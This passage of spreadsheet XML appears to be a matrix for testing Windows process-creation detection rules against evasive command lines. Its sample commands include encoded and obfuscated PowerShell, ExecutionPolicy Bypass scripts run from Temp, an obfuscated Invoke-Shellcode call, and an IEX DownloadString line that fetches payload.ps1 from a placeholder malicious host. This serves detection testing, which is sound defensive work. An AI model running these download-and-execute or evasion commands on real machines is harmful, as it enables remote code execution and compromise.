      <c r="I4309" s="43" t="n"/>
      <c r="J4309" s="43" t="n"/>
      <c r="K4309" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4310" ht="15.75" customHeight="1" s="42">
      <c r="A4310" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4310" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C4310" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D4310" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E4310" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F4310" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4310" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4310" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4310" s="43" t="n"/>
      <c r="J4310" s="43" t="n"/>
      <c r="K4310" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4311" ht="15.75" customHeight="1" s="42">
      <c r="A4311" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4311" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C4311" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D4311" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E4311" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F4311" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4311" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4311" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4311" s="43" t="n"/>
      <c r="J4311" s="43" t="n"/>
      <c r="K4311" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4312" ht="15.75" customHeight="1" s="42">
      <c r="A4312" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4312" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C4312" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D4312" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E4312" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F4312" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4312" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4312" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4312" s="43" t="n"/>
      <c r="J4312" s="43" t="n"/>
      <c r="K4312" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4313" ht="15.75" customHeight="1" s="42">
      <c r="A4313" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4313" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C4313" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D4313" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E4313" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F4313" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4313" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4313" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4313" s="43" t="n"/>
      <c r="J4313" s="43" t="n"/>
      <c r="K4313" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4314" ht="15.75" customHeight="1" s="42">
      <c r="A4314" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4314" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C4314" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D4314" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E4314" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F4314" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4314" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4314" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4314" s="43" t="n"/>
      <c r="J4314" s="43" t="n"/>
      <c r="K4314" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4315" ht="15.75" customHeight="1" s="42">
      <c r="A4315" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4315" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C4315" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D4315" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E4315" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F4315" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4315" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4315" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4315" s="43" t="n"/>
      <c r="J4315" s="43" t="n"/>
      <c r="K4315" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4316" ht="15.75" customHeight="1" s="42">
      <c r="A4316" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4316" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C4316" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D4316" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E4316" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F4316" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4316" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4316" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4316" s="43" t="n"/>
      <c r="J4316" s="43" t="n"/>
      <c r="K4316" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4317" ht="15.75" customHeight="1" s="42">
      <c r="A4317" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4317" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C4317" s="43" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D4317" s="43" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E4317" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set a=Wscript.&amp;&amp; set b=Shell&amp;&amp; set c=Run&amp;&amp; call echo %a%%b%.%c%"</t>
        </is>
      </c>
      <c r="F4317" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4317" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4317" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4317" s="43" t="n"/>
      <c r="J4317" s="43" t="n"/>
      <c r="K4317" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4318" ht="15.75" customHeight="1" s="42">
      <c r="A4318" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4318" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C4318" s="43" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D4318" s="43" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E4318" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$s = 'Wscript.Shell'; $o = New-Object -ComObject $s; $m = 'Run'; $o.$m.Invoke('calc.exe')"</t>
        </is>
      </c>
      <c r="F4318" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4318" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4318" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4318" s="43" t="n"/>
      <c r="J4318" s="43" t="n"/>
      <c r="K4318" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4319" ht="15.75" customHeight="1" s="42">
      <c r="A4319" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4319" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C4319" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D4319" s="43" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E4319" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -"File" C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F4319" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4319" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4319" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33)</t>
        </is>
      </c>
      <c r="J4319" s="43" t="n"/>
      <c r="K4319" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4320" ht="15.75" customHeight="1" s="42">
      <c r="A4320" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4320" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_env_folder</t>
        </is>
      </c>
      <c r="C4320" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder</t>
        </is>
      </c>
      <c r="D4320" s="43" t="inlineStr">
        <is>
          <t>1228c958-e64e-4e71-92ad-7d429f4138ba</t>
        </is>
      </c>
      <c r="E4320" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public &amp;&amp; wscript.exe payload.vbs"</t>
        </is>
      </c>
      <c r="F4320" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4320" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4320" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4320" s="43" t="n"/>
      <c r="J4320" s="43" t="n"/>
      <c r="K4320" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4321" ht="15.75" customHeight="1" s="42">
      <c r="A4321" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4321" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4321" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4321" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4321" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\Temp &amp;&amp; powershell.exe -ExecutionPolicy Bypass -File .\script.ps1"</t>
        </is>
      </c>
      <c r="F4321" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4321" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4321" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4321" s="43" t="n"/>
      <c r="K4321" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4322" ht="15.75" customHeight="1" s="42">
      <c r="A4322" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4322" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4322" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4322" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4322" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -FILE C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F4322" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4322" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4322" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4322" s="43" t="n"/>
      <c r="J4322" s="43" t="n"/>
      <c r="K4322" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4323" ht="15.75" customHeight="1" s="42">
      <c r="A4323" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4323" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4323" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4323" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4323" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -f C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F4323" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4323" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4323" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4323" s="43" t="n"/>
      <c r="J4323" s="43" t="n"/>
      <c r="K4323" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4324" ht="15.75" customHeight="1" s="42">
      <c r="A4324" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4324" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4324" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4324" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4324" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXECuTIoNpOLIcy Bypass /"File" C:\Windows\Temp\script.ps1 -COmmEnT " &gt; "</t>
        </is>
      </c>
      <c r="F4324" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4324" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4324" s="43" t="inlineStr">
        <is>
          <t>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4324" s="43" t="n"/>
      <c r="K4324" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4325" ht="15.75" customHeight="1" s="42">
      <c r="A4325" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4325" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4325" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4325" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4325" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"File" C:\Windows\Temp\script.ps1 -COmmENT " &gt; "</t>
        </is>
      </c>
      <c r="F4325" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4325" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4325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4325" s="43" t="n"/>
      <c r="K4325" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4326" ht="15.75" customHeight="1" s="42">
      <c r="A4326" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4326" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4326" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4326" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4326" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -fILE C:\Windows\Temp\script.ps1 -COmmEnt " &gt; "</t>
        </is>
      </c>
      <c r="F4326" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4326" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4326" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4326" s="43" t="n"/>
      <c r="J4326" s="43" t="n"/>
      <c r="K4326" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4327" ht="15.75" customHeight="1" s="42">
      <c r="A4327" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4327" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysprep_appdata</t>
        </is>
      </c>
      <c r="C4327" s="43" t="inlineStr">
        <is>
          <t>Sysprep on AppData Folder</t>
        </is>
      </c>
      <c r="D4327" s="43" t="inlineStr">
        <is>
          <t>d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e</t>
        </is>
      </c>
      <c r="E4327" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Default\AppData\Local\Temp &amp;&amp; C:\Windows\System32\sysprep\sysprep.exe /unattend:payload.xml"</t>
        </is>
      </c>
      <c r="F4327" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4327" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4327" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4327" s="43" t="n"/>
      <c r="J4327" s="43" t="n"/>
      <c r="K4327" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4328" ht="15.75" customHeight="1" s="42">
      <c r="A4328" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4328" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysprep_appdata</t>
        </is>
      </c>
      <c r="C4328" s="43" t="inlineStr">
        <is>
          <t>Sysprep on AppData Folder</t>
        </is>
      </c>
      <c r="D4328" s="43" t="inlineStr">
        <is>
          <t>d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e</t>
        </is>
      </c>
      <c r="E4328" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "cd C:\Users\Default\AppData\Local\Temp &amp;&amp; C:\Windows\System32\sysprep\sysprep.exe /unattend:payload.xml"</t>
        </is>
      </c>
      <c r="F4328" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4328" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4328" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4328" s="43" t="n"/>
      <c r="J4328" s="43" t="n"/>
      <c r="K4328" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4329" ht="15.75" customHeight="1" s="42">
      <c r="A4329" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4329" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4329" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4329" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4329" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F4329" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4329" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4329" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4329" s="43" t="n"/>
      <c r="J4329" s="43" t="n"/>
      <c r="K4329" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4330" ht="15.75" customHeight="1" s="42">
      <c r="A4330" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4330" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4330" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4330" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4330" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOprOfIle /"NonInteractive" -ep Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F4330" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4330" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4330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30" s="43" t="n"/>
      <c r="K4330" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4331" ht="15.75" customHeight="1" s="42">
      <c r="A4331" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4331" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4331" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4331" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4331" s="43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4331" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4331" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I433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31" s="43" t="n"/>
      <c r="K4331" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4332" ht="15.75" customHeight="1" s="42">
      <c r="A4332" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4332" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4332" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4332" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4332" s="43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4332" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4332" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4332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32" s="43" t="n"/>
      <c r="K4332" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4333" ht="15.75" customHeight="1" s="42">
      <c r="A4333" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4333" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4333" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4333" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4333" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F4333" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4333" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4333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33" s="43" t="n"/>
      <c r="K4333" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4334" ht="15.75" customHeight="1" s="42">
      <c r="A4334" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4334" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4334" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4334" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4334" s="43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4334" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4334" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4334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34" s="43" t="n"/>
      <c r="K4334" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4335" ht="15.75" customHeight="1" s="42">
      <c r="A4335" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4335" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4335" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4335" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4335" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F4335" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4335" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4335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335" s="43" t="n"/>
      <c r="K4335" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4336" ht="15.75" customHeight="1" s="42">
      <c r="A4336" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4336" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4336" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4336" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4336" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F4336" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4336" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4336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336" s="43" t="n"/>
      <c r="K4336" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4337" ht="15.75" customHeight="1" s="42">
      <c r="A4337" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4337" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4337" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4337" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4337" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F4337" s="43" t="b">
        <v>1</v>
